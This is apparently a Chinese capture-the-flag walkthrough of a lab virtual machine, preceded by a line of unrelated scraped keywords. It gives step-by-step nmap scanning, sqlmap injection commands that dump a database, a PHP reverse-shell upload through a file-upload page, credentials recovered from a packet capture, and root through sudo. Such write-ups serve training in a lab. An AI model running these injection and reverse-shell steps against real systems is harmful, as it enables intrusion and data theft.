网站图片alt属性设置,wordpress花瓣网,做问卷用哪个网站,wordpress oss 内网一、信息收集
1、主机发现
nmap 192.168.236.0/24 2、端口扫描
nmap 192.168.236.173 -p- -A 3、目录扫描
dirb http://192.168.236.173 二、漏洞探测
访问80端口 访问 /nt4stopc/ 下面有一些问题#xff0c;提示必须收集答案 都是一些判断题#xff0c;对与错对应1与0提示必须收集答案 都是一些判断题对与错对应1与0最后结果为
0110111001
拼接访问 点击图中位置发现url中存在参数可能存在注入 直接用sqlmap跑一下
python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch 库名
python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch --dbs tatil 库下的表名
python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch -D tatil --tables gereksiz 表下得到一串值
python3 sqlmap.py -u http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/go.php?id1 --batch -D tatil -T gereksiz --dumphihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php 解码
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
可能是路径拼接访问 再拼接 /upload.php 文件上传以md5提交但是没有提交按钮自己在前端加一个
input typesubmit 三、GetShell
kali 反弹shell
locate php-reverse-shell.phpcp /usr/share/webshells/php/php-reverse-shell.php .nano php-reverse-shell.php 上传该文件后返回了文件路径文件名为md5加密后的
osas/2ad6bded962b884337eaeb921d7c2764.php 浏览器访问kali 成功反弹到shell
http://192.168.236.173/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php 四、提权
使用python提高交互性
python3 -c import pty;pty.spawn(/bin/bash) 在 /var/www/html 下发现 important.pcapng 查看文件内容发现
emailmkelepcemessageHellothere%2CThepasswordfortheSSHaccountyouwantis%3Amkelepce%3Amklpc-osas112.Ifyouencounteraproblem%2Cjustmailit.Goodwork url解码得到以下数据
emailmkelepcemessageHello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work
账号密码
mkelepce:mklpc-osas112.
ssh连接
ssh mkelepce192.168.236.173 查看具有root权限的命令
sudo -l 显示为 all 直接 sudo su 提权提权成功
sudo su 查看flag
